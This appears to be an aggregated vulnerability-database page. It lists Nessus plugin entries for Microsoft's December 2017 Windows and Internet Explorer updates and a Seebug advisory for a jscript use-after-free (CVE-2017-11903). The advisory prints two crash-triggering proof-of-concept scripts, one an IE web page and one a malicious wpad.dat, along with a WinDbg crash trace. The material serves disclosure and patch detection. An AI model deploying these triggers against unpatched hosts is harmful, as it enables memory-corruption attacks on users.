    titleKB4053578: Windows 10 Version 1511 December 2017 Security Update
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4054520.NASL
    descriptionThe remote Windows host is missing security update 4054523 or cumulative update 4054520. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11912) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)
    last seen2020-06-01
    modified2020-06-02
    plugin id105186
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105186
    titleWindows Server 2012 December 2017 Security Updates
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4054519.NASL
    descriptionThe remote Windows host is missing security update 4054522 or cumulative update 4054519. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
    last seen2020-06-01
    modified2020-06-02
    plugin id105185
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105185
    titleWindows 8.1 and Windows Server 2012 R2 December 2017 Security Updates
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_INTERNET_EXPLORER.NASL
    descriptionThe Internet Explorer installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)
    last seen2020-06-01
    modified2020-06-02
    plugin id105188
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/105188
    titleSecurity Updates for Internet Explorer (December 2017)
  • NASL familyWindows : Microsoft Bulletins
    NASL idSMB_NT_MS17_DEC_4053579.NASL
    descriptionThe remote Windows host is missing security update 4053579. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11889, CVE-2017-11893, CVE-2017-11905, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11914, CVE-2017-11918) - A security feature bypass exists when Device Guard incorrectly validates an untrusted file. An attacker who successfully exploited this vulnerability could make an unsigned file appear to be signed. Because Device Guard relies on the signature to determine the file is non- malicious, Device Guard could then allow a malicious file to execute. In an attack scenario, an attacker could make an untrusted file appear to be a trusted file. The update addresses the vulnerability by correcting how Device Guard handles untrusted files. (CVE-2017-11899) - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11919) - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11888) - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913) - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11885) - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930) - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906) - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. (CVE-2017-11927)
    last seen2020-06-01
    modified2020-06-02
    plugin id105180
    published2017-12-12
    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105180
    titleKB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/145480/GS20171219054843.txt
idPACKETSTORM:145480
last seen2017-12-19
published2017-12-18
reporterIvan Fratric
sourcehttps://packetstormsecurity.com/files/145480/Windows-jscript-NameTbl-GetValDef-Use-After-Free.html
titleWindows jscript!NameTbl::GetValDef Use-After-Free

Seebug

bulletinFamilyexploit
descriptionThere is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors: - An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service. - The issue can also be exploited by opening a malicious web page in Internet Explorer. The issue has been verified on 64-bit Win7 with the most recent patches applied. PoC for Internet Explorer (might require page heap to trigger the crash): ``` <!-- saved from url=(0014)about:internet --> <meta http-equiv="X-UA-Compatible" content="IE=8"></meta> <script language="Jscript.Encode"> var vars = new Array(100); for(var i=0;i<100;i++) vars[i] = {}; function f() { vars[1] = 1; CollectGarbage(); return {}; } vars[1].toString = f; Array.prototype.join.call(vars); </script> ``` PoC for WPAD (might require page heap to trigger the crash): ``` function FindProxyForURL(url, host) { var vars = new Array(100); for(var i=0;i<100;i++) vars[i] = {}; function f() { vars[1] = 1; CollectGarbage(); return {}; } vars[1].toString = f; Array.prototype.join.call(vars); return "DIRECT"; } ``` ### Technical details: The issue is in NameTbl::GetValDef which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't an JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). Basically, toString/valueOf can delete its 'this' object. Note that the crash location in the Debug log immediately precedes a virtual method call. Debug log (from IE, but it looks similar in the WPAD service): ``` (a68.e4c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. jscript!NameTbl::GetValDef+0x58: 000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=???????????????? 0:013> r rax=0000000000000001 rbx=000007fef5d7bd50 rcx=00000000044acfa0 rdx=0000000000000000 rsi=0000000012b49fb8 rdi=0000000000000001 rip=000007fef5dea398 rsp=0000000012b49ae0 rbp=0000000000000000 r8=0000000004309f20 r9=0000000004309670 r10=0000000000000081 r11=0000000012b49a60 r12=0000000000000080 r13=0000000000000008 r14=00000000044d9f90 r15=0000000000000000 iopl=0 nv up ei ng nz ac po cy cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297 jscript!NameTbl::GetValDef+0x58: 000007fe`f5dea398 498b06 mov rax,qword ptr [r14] ds:00000000`044d9f90=???????????????? 0:013> k # Child-SP RetAddr Call Site 00 00000000`12b49ae0 000007fe`f5dad069 jscript!NameTbl::GetValDef+0x58 01 00000000`12b49b70 000007fe`f5d7de69 jscript!NameTbl::InvokeInternal+0xb07 02 00000000`12b49c90 000007fe`f5d7bf3b jscript!VAR::GetValue+0xa1 03 00000000`12b49ce0 000007fe`f5ddb65d jscript!ConvertToString+0x5b 04 00000000`12b49f60 000007fe`f5d7c2ec jscript!JsArrayJoin+0x38d 05 00000000`12b4a060 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138 06 00000000`12b4a110 000007fe`f5d786ea jscript!NameTbl::InvokeInternal+0x3f8 07 00000000`12b4a230 000007fe`f5dcdd72 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea 08 00000000`12b4a280 000007fe`f5d7c2ec jscript!JsFncCall+0xc2 09 00000000`12b4a310 000007fe`f5d7a9fe jscript!NatFncObj::Call+0x138 0a 00000000`12b4a3c0 000007fe`f5d7b234 jscript!NameTbl::InvokeInternal+0x3f8 0b 00000000`12b4a4e0 000007fe`f5d79852 jscript!VAR::InvokeByName+0x81c 0c 00000000`12b4a6f0 000007fe`f5d79929 jscript!VAR::InvokeDispName+0x72 0d 00000000`12b4a770 000007fe`f5d724b8 jscript!VAR::InvokeByDispID+0x1229 0e 00000000`12b4a7c0 000007fe`f5d78ec2 jscript!CScriptRuntime::Run+0x5a6 0f 00000000`12b4b5c0 000007fe`f5d78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 10 00000000`12b4b7d0 000007fe`f5d78b95 jscript!ScrFncObj::Call+0xb7 11 00000000`12b4b870 000007fe`f5d7e6c0 jscript!CSession::Execute+0x19e 12 00000000`12b4b940 000007fe`f5d870e7 jscript!COleScript::ExecutePendingScripts+0x17a 13 00000000`12b4ba10 000007fe`f5d868d6 jscript!COleScript::ParseScriptTextCore+0x267 14 00000000`12b4bb00 000007fe`ead55251 jscript!COleScript::ParseScriptText+0x56 15 00000000`12b4bb60 000007fe`eb4db320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 16 00000000`12b4bbe0 000007fe`ead56256 MSHTML!CScriptCollection::ParseScriptText+0x37f 17 00000000`12b4bcc0 000007fe`ead55c8e MSHTML!CScriptData::CommitCode+0x3d9 18 00000000`12b4be90 000007fe`ead55a11 MSHTML!CScriptData::Execute+0x283 19 00000000`12b4bf50 000007fe`eb5146fb MSHTML!CHtmScriptParseCtx::Execute+0x101 1a 00000000`12b4bf90 000007fe`eadf8a5b MSHTML!CHtmParseBase::Execute+0x235 1b 00000000`12b4c030 000007fe`eacd2e39 MSHTML!CHtmPost::Broadcast+0x90 1c 00000000`12b4c070 000007fe`ead2caef MSHTML!CHtmPost::Exec+0x4bb 1d 00000000`12b4c280 000007fe`ead2ca40 MSHTML!CHtmPost::Run+0x3f 1e 00000000`12b4c2b0 000007fe`ead2da12 MSHTML!PostManExecute+0x70 1f 00000000`12b4c330 000007fe`ead30843 MSHTML!PostManResume+0xa1 20 00000000`12b4c370 000007fe`ead16fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 21 00000000`12b4c3c0 000007fe`eb544f78 MSHTML!CDwnChan::OnMethodCall+0x41 22 00000000`12b4c3f0 000007fe`eac39d75 MSHTML!GlobalWndOnMethodCall+0x240 23 00000000`12b4c490 00000000`77709bbd MSHTML!GlobalWndProc+0x150 24 00000000`12b4c510 00000000`777098c2 USER32!UserCallWinProcCheckWow+0x1ad 25 00000000`12b4c5d0 000007fe`f2be4a87 USER32!DispatchMessageWorker+0x3b5 26 00000000`12b4c650 000007fe`f2bebabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 27 00000000`12b4f8d0 000007fe`fe88572f IEFRAME!LCIETab_ThreadProc+0x3a3 28 00000000`12b4fa00 000007fe`f5ff925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f 29 00000000`12b4fa30 00000000`775e59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f 2a 00000000`12b4fa80 00000000`7781a561 kernel32!BaseThreadInitThunk+0xd 2b 00000000`12b4fab0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d 0:013> !heap -p -a 00000000`044d9f90 address 00000000044d9f90 found in _DPH_HEAP_ROOT @ 3fd1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 3fe0680: 44d9000 2000 000007fef5f78726 verifier!AVrfDebugPageHeapFree+0x00000000000000a2 00000000778b4255 ntdll!RtlDebugFreeHeap+0x0000000000000035 000000007785797c ntdll! ?? ::FNODOBFM::`string'+0x000000000000e982 000007feff2110c8 msvcrt!free+0x000000000000001c 000007fef5d7bad2 jscript!NativeErrorProtoObj<16>::`vector deleting destructor'+0x0000000000000022 000007fef5d7b938 jscript!NameTbl::SetMasterVariant+0x000000000000a240 000007fef5d942cb jscript!GcAlloc::ReclaimGarbage+0x000000000000034d 000007fef5d719e2 jscript!GcContext::Reclaim+0x00000000000000ae 000007fef5d81956 jscript!GcContext::CollectCore+0x000000000000018b 000007fef5d817a5 jscript!GcContext::Collect+0x0000000000000025 000007fef5dc42f3 jscript!JsCollectGarbage+0x0000000000000023 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138 000007fef5d7c199 jscript!NameTbl::InvokeInternal+0x0000000000000377 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea 000007fef5d724b8 jscript!CScriptRuntime::Run+0x00000000000005a6 000007fef5d78ec2 jscript!ScrFncObj::CallWithFrameOnStack+0x0000000000000162 000007fef5d78d2b jscript!ScrFncObj::Call+0x00000000000000b7 000007fef5da2084 jscript!NameTbl::InvokeInternal+0x000000000000060f 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea 000007fef5dea422 jscript!NameTbl::GetValDef+0x00000000000000e2 000007fef5dad069 jscript!NameTbl::InvokeInternal+0x0000000000000b07 000007fef5d7de69 jscript!VAR::GetValue+0x00000000000000a1 000007fef5d7bf3b jscript!ConvertToString+0x000000000000005b 000007fef5ddb65d jscript!JsArrayJoin+0x000000000000038d 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138 000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8 000007fef5d786ea jscript!VAR::InvokeByDispID+0xffffffffffffffea 000007fef5dcdd72 jscript!JsFncCall+0x00000000000000c2 000007fef5d7c2ec jscript!NatFncObj::Call+0x0000000000000138 000007fef5d7a9fe jscript!NameTbl::InvokeInternal+0x00000000000003f8 000007fef5d7b234 jscript!VAR::InvokeByName+0x000000000000081c 000007fef5d79852 jscript!VAR::InvokeDispName+0x0000000000000072 0:013> u rip jscript!NameTbl::GetValDef+0x58: 000007fe`f5dea398 498b06 mov rax,qword ptr [r14] 000007fe`f5dea39b 488b98e0000000 mov rbx,qword ptr [rax+0E0h] 000007fe`f5dea3a2 488bcb mov rcx,rbx 000007fe`f5dea3a5 ff15b5320400 call qword ptr [jscript!_guard_check_icall_fptr (000007fe`f5e2d660)] 000007fe`f5dea3ab 488b54fc40 mov rdx,qword ptr [rsp+rdi*8+40h] 000007fe`f5dea3b0 4c8d442450 lea r8,[rsp+50h] 000007fe`f5dea3b5 498bce mov rcx,r14 000007fe`f5dea3b8 ffd3 call rbx ```
idSSV:97003
last seen2017-12-25
modified2017-12-20
published2017-12-20
reporterRoot
titleWindows: use-after-free in jscript!NameTbl::GetValDef(CVE-2017-11903)